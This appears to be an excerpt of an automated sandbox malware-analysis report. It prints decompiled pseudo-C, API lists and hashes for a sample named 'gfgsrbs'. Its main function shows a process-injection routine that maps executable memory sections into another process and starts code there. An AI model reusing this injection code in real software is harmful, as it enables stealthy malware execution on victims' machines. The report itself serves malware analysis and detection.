                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                      • Instruction ID: fcafa90473e3bce6dbc0f334a66e4de9b25c1110b2005182b8d4e3deb893a7aa
                      • Opcode Fuzzy Hash: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                      • Instruction Fuzzy Hash: 515107B1900245BFEB219F91CC48FEFBBB9EF85B10F104129FA11AA2A5D7709945CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014DD Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 236 4014dd-4014f1 call 40119e 240 4014f3 236->240 241 4014f6-4014fb 236->241 240->241 243 401501-401512 241->243 244 401824-40182c 241->244 248 401822 243->248 249 401518-401541 243->249 244->241 247 401831-401842 244->247 251 401845-401866 call 40119e 247->251 252 401838-40183e 247->252 248->247 249->248 259 401547-40155e NtDuplicateObject 249->259 252->251 259->248 260 401564-401588 NtCreateSection 259->260 262 4015e4-40160a NtCreateSection 260->262 263 40158a-4015ab NtMapViewOfSection 260->263 262->248 266 401610-401614 262->266 263->262 265 4015ad-4015c9 NtMapViewOfSection 263->265 265->262 267 4015cb-4015e1 265->267 266->248 268 40161a-40163b NtMapViewOfSection 266->268 267->262 268->248 269 401641-40165d NtMapViewOfSection 268->269 269->248 271 401663 call 401668 269->271
                      C-Code - Quality: 63%
                      			E004014DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				void* _t163;
				intOrPtr* _t164;
				void* _t167;
				long _t175;
				intOrPtr _t177;
				void* _t178;
				long* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t193;
				void* _t194;
				intOrPtr* _t197;
				void* _t198;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				L0040119E(_t84, __ecx, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t202 + 8));
				_t175 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t87;
				_t184 = _t202 - 0x60;
				 *_t184 = _t175;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t184);
				_t90 =  *_t184;
				if(_t90 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t175;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t175, _t175, 2) == 0) {
						 *(_t202 - 8) = _t175;
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t175;
						 *_t98 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t175, _t98, 4, 0x8000000, _t175) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t121 = _t202 - 0x44;
							 *_t121 = _t175;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t121, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
								_t123 = _t202 - 0x3c;
								 *_t123 = _t175;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t123, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t175, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t100 = _t202 - 0x50;
						 *(_t100 + 4) = _t175;
						 *_t100 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						if(NtCreateSection(_t188, 0xe, _t175, _t100, 0x40, 0x8000000, _t175) == 0 &&  *(_t202 - 8) != 0) {
							 *_t46 =  *(_t202 - 0x50);
							_t102 = _t202 - 0x48;
							 *_t102 = _t175;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t102, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
								_t104 = _t202 - 0x40;
								 *_t104 = _t175;
								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t104, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 0x20);
								if(_t224 == 0) {
									L16();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t160 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t161 = _t160;
									asm("loop 0xffffffc2");
									_t162 = _t161 ^ 0xbcc951dd;
									_t204 = _t209 - _t162;
									_t193 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
									_t139 =  *(_t193 + 6) & 0x0000ffff;
									_push(_t193);
									_t163 = _t193;
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_t164 = _t163 + 0xf8;
										__eflags = _t164;
									} else {
										_t164 = _t163 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t164 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t164 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t164 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t194);
									_t229 =  *((intOrPtr*)(_t202 - 0x34));
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_push(_t194);
										_t167 =  *((intOrPtr*)(_t194 + 0x34)) -  *(_t202 - 0x40);
										_t197 =  *((intOrPtr*)(_t194 + 0xa0)) +  *(_t202 - 0x48);
										__eflags = _t197;
										while(1) {
											__eflags =  *_t197;
											if( *_t197 == 0) {
												break;
											}
											_t177 =  *_t197;
											_t197 = _t197 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t167;
												__eflags =  *((intOrPtr*)(0 +  *(_t202 - 0x48) + _t177));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t198);
										_t175 = 0;
										__eflags = 0;
										_t108 = _t202 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t198 + 0x28)) +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t108, 0);
									} else {
										L49();
										_pop(_t178);
										_t175 = _t178 - 0x1760;
										 *((intOrPtr*)(_t175 + 0x1794)) = _t175 + 0x2c17;
										L00401227(_t128, _t175, _t229, _t175 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t175 + 0x17b9)) = _t175 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t175, _t229);
			}












































                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                      • Instruction ID: c414ae2dcce1999d5ff69eab83f34e0e1241aa209a2fbae03b06ced14e898130
                      • Opcode Fuzzy Hash: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                      • Instruction Fuzzy Hash: 085106B1900249BFEF219F91CC48FEFBBB9EF85B10F104119FA11AA2A5D7709940CB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040E703 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 273 40e703-40e712 275 40e714-40e717 273->275 276 40e718-40e71b 273->276 277 40e72b-40e734 call 4111b8 276->277 278 40e71d-40e722 276->278 281 40e739-40e73e 277->281 278->278 279 40e724-40e729 278->279 279->277 279->278 282 40e740-40e74c 281->282 283 40e74d-40e758 281->283 283->282
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __malloc_crt
                      • String ID:
                      • API String ID: 3464615804-0
                      • Opcode ID: 501dda1f62610471c31aec79cd889d8af2f544a4fc306c4e666a9dbeabe91d77
                      • Instruction ID: fc55ce3b648994ae0669cb83a6c03f413a82d86dd79d98679187b4526597e74b
                      • Opcode Fuzzy Hash: 501dda1f62610471c31aec79cd889d8af2f544a4fc306c4e666a9dbeabe91d77
                      • Instruction Fuzzy Hash: 92F09E339001205DD720773A3C048770629DAC63693150C3BF692E3281F6380C8342E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040E7AC Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 286 40e7ac-40e7ce HeapCreate 287 40e7d0-40e7d1 286->287 288 40e7d2-40e7db 286->288
                      APIs
                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040E7C1
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: CreateHeap
                      • String ID:
                      • API String ID: 10892065-0
                      • Opcode ID: b393221473d5128b1f0148c2de5562a25426e395ddf46944ff430698e6d466b0
                      • Instruction ID: cc9ea7525e2f4401f88430c5405be3d1bc70efe095c2ac504a773410bf562ff0
                      • Opcode Fuzzy Hash: b393221473d5128b1f0148c2de5562a25426e395ddf46944ff430698e6d466b0
                      • Instruction Fuzzy Hash: 96D05E369583445EEB105FB56D087623BDCD784795F049436B90CDA6A0E674C650DA44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040A0CD Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 289 40a0cd-40a0cf call 40a05b 291 40a0d4-40a0d5 289->291
                      APIs
                      • __encode_pointer.LIBCMT ref: 0040A0CF
                        • Part of subcall function 0040A05B: RtlEncodePointer.NTDLL(?), ref: 0040A0C2
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: EncodePointer__encode_pointer
                      • String ID:
                      • API String ID: 4150071819-0
                      • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction ID: 50ed121f21e01714d4d4106e0456cc313bcbcd0e045e12985174d0a2d6778b00
                      • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 292 401869-4018bd call 40119e Sleep call 4013d8 303 4018cc-401907 call 40119e 292->303 304 4018bf-4018c7 call 4014a8 292->304 304->303
                      C-Code - Quality: 62%
                      			E00401869(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __edi;
				void* __ebp;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				signed char _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;

				_t24 = __eflags;
				_push(0x18a0);
				_t8 =  *_t21;
				_t22 = _t21 + 4;
				L0040119E(_t8, 0x63, _t20, __eflags);
				_t16 = _a4;
				Sleep(0x1388);
				_t11 = E004013D8(_t19, _t24, _t16, _a8, _a12,  &_v8); // executed
				_t25 = _t11;
				if(_t11 != 0) {
					E004014A8(_t25, _t16, _t11, _v8, _a16); // executed
				}
				 *_t16(0xffffffff, 0);
				_push(0x18a0);
				_t13 =  *_t22;
				return L0040119E(_t13, 0x63, _t20, _t25);
			}














                      0x00401869
                      0x00401877
                      0x0040187c
                      0x0040187f
                      0x0040189b
                      0x004018a0
                      0x004018a8
                      0x004018b6
                      0x004018bb
                      0x004018bd
                      0x004018c7
                      0x004018c7
                      0x004018d0
                      0x004018d9
                      0x004018de
                      0x00401907

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 6296850e33a145ab6595ce586122c29eccd5567035ad5b983bd76f19fb0b0644
                      • Instruction ID: 60862f2667b59bfd2b53fd736c2ec37b6a52218a42a16e6e58fdf04961db7cc8
                      • Opcode Fuzzy Hash: 6296850e33a145ab6595ce586122c29eccd5567035ad5b983bd76f19fb0b0644
                      • Instruction Fuzzy Hash: 79015E37608204E7E7007A95DC8197A37699B45354F208137BA13791E1D63D9B12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040188B Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 315 40188b-4018bd call 40119e Sleep call 4013d8 322 4018cc-401907 call 40119e 315->322 323 4018bf-4018c7 call 4014a8 315->323 323->322
                      C-Code - Quality: 62%
                      			E0040188B(signed char __eax, void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t13;
				intOrPtr _t15;
				intOrPtr* _t19;
				signed char _t24;
				void* _t28;
				intOrPtr* _t30;

				_t33 = __eflags;
				_t25 = __edi;
				asm("out 0xdc, al");
				_t24 = __eax;
				L0040119E(__edx, 0x63, __edi, __eflags);
				_t19 =  *((intOrPtr*)(_t28 + 8));
				Sleep(0x1388);
				_t13 = E004013D8(_t24, _t33, _t19,  *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)(_t28 + 0x10)), _t28 - 4); // executed
				_t34 = _t13;
				if(_t13 != 0) {
					E004014A8(_t34, _t19, _t13,  *((intOrPtr*)(_t28 - 4)),  *((intOrPtr*)(_t28 + 0x14))); // executed
				}
				 *_t19(0xffffffff, 0);
				_push(0x18a0);
				_t15 =  *_t30;
				return L0040119E(_t15, 0x63, _t25, _t34);
			}









                      0x0040188b
                      0x0040188b
                      0x0040188b
                      0x0040188e
                      0x0040189b
                      0x004018a0
                      0x004018a8
                      0x004018b6
                      0x004018bb
                      0x004018bd
                      0x004018c7
                      0x004018c7
                      0x004018d0
                      0x004018d9
                      0x004018de
                      0x00401907

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 3ccb135d8cd8dc8608f35812b1b48db498075e36bc90ac32ca3eb8d1277e0039
                      • Instruction ID: a729e010e1eaefc24d003010d97dd2b43a4c6b95cafc309fd02eabc3c929d3cf
                      • Opcode Fuzzy Hash: 3ccb135d8cd8dc8608f35812b1b48db498075e36bc90ac32ca3eb8d1277e0039
                      • Instruction Fuzzy Hash: 7AF04F37704205EBDB00BA95DC81A6E3769DF44315F20803BB612B91F1C63D8B12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040189A Relevance: 1.3, APIs: 1, Instructions: 37sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 334 40189a-4018bd call 40119e Sleep call 4013d8 340 4018cc-401907 call 40119e 334->340 341 4018bf-4018c7 call 4014a8 334->341 341->340
                      C-Code - Quality: 61%
                      			E0040189A(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				signed char _t21;
				void* _t25;
				intOrPtr* _t27;

				_t30 = __eflags;
				_t22 = __edi;
				_pop(ds);
				L0040119E(_t8, __ecx, __edi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t11 = E004013D8(_t21, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				_t31 = _t11;
				if(_t11 != 0) {
					E004014A8(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x18a0);
				_t13 =  *_t27;
				return L0040119E(_t13, 0x63, _t22, _t31);
			}










                      0x0040189a
                      0x0040189a
                      0x0040189a
                      0x0040189b
                      0x004018a0
                      0x004018a8
                      0x004018b6
                      0x004018bb
                      0x004018bd
                      0x004018c7
                      0x004018c7
                      0x004018d0
                      0x004018d9
                      0x004018de
                      0x00401907

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 19053c3fc689dbcb7e5f7681520f18359435fcd39de0bfa97560276b7de449ff
                      • Instruction ID: fa21e6fe5ec55b494b8a61ead8be6eb3dfa9bfc2d8f44280934193d3a60a32fd
                      • Opcode Fuzzy Hash: 19053c3fc689dbcb7e5f7681520f18359435fcd39de0bfa97560276b7de449ff
                      • Instruction Fuzzy Hash: B3F01D37604205EBDB00BA95DC819AE3769AF04315F20843BBA12B90E1C6398B12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 0040A81C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0040A836
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040A847
                      • __getptd.LIBCMT ref: 0040A855
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: MOC$csm
                      • API String ID: 803148776-1389381023
                      • Opcode ID: 671699303d6b60e28057f17e5ec861d0093e6d5f61e45ced52332932ffd97aae
                      • Instruction ID: db0c76aa7c4e0e0626e6bed2eef3fec0a3783135ff2f5cf4364eea1cffeb3cee
                      • Opcode Fuzzy Hash: 671699303d6b60e28057f17e5ec861d0093e6d5f61e45ced52332932ffd97aae
                      • Instruction Fuzzy Hash: 6EE012325103048FD710AAA5C4457563394FB54318F6945B6A808D7393C73CEC615687
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040C183 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __fileno__flsbuf__flush__locking
                      • String ID:
                      • API String ID: 2259706978-0
                      • Opcode ID: 15180966515bcd9a64484e0174daa60dbe67719289ee5ef70f2a1fc3c6d11957
                      • Instruction ID: 7db9d4361589b3ed1bd66184b58abc72e1ff8a651a3b30b1fe564f823639e331
                      • Opcode Fuzzy Hash: 15180966515bcd9a64484e0174daa60dbe67719289ee5ef70f2a1fc3c6d11957
                      • Instruction Fuzzy Hash: D5419031E00604DBDB249FE988C059FB7B6AF80320F24877FE815A66D1D778DE419B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040A1C2 Relevance: 6.1, APIs: 4, Instructions: 57COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                      • String ID:
                      • API String ID: 1628550938-0
                      • Opcode ID: 77557e80ab456e670524621a6396b0ec4f5b533249553a52296d6b2d98cacb2a
                      • Instruction ID: 90b4e4d6a6b9f7267b9c86ff23d96e3d4ca3ffa8321baab54594e45d1f43a617
                      • Opcode Fuzzy Hash: 77557e80ab456e670524621a6396b0ec4f5b533249553a52296d6b2d98cacb2a
                      • Instruction Fuzzy Hash: DF115171540701DFD710AF7A9905B9ABBE0AF04314F10457FE499B62E1CBB89A40CB5D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040AACD Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0040AAFF
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040AB0D
                      • __getptd.LIBCMT ref: 0040AB1B
                      • __getptd.LIBCMT ref: 0040AB26
                        • Part of subcall function 0040ABF3: __getptd.LIBCMT ref: 0040AC02
                        • Part of subcall function 0040ABF3: __getptd.LIBCMT ref: 0040AC10
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID:
                      • API String ID: 803148776-0
                      • Opcode ID: 5acad694606c70bc299f6e3d03924e6ad357319d4721c8e7a9f3fb00c0938d84
                      • Instruction ID: 4ceb4badccefb88abe74292121835467509f31c118642c149aaa2b759065458d
                      • Opcode Fuzzy Hash: 5acad694606c70bc299f6e3d03924e6ad357319d4721c8e7a9f3fb00c0938d84
                      • Instruction Fuzzy Hash: 9911DAB1C00309DFDB00EFA5D845ADE7BB1FF04318F10856AF854A7292DB789A519F59
                      Uniqueness

                      Uniqueness Score: -1.00%

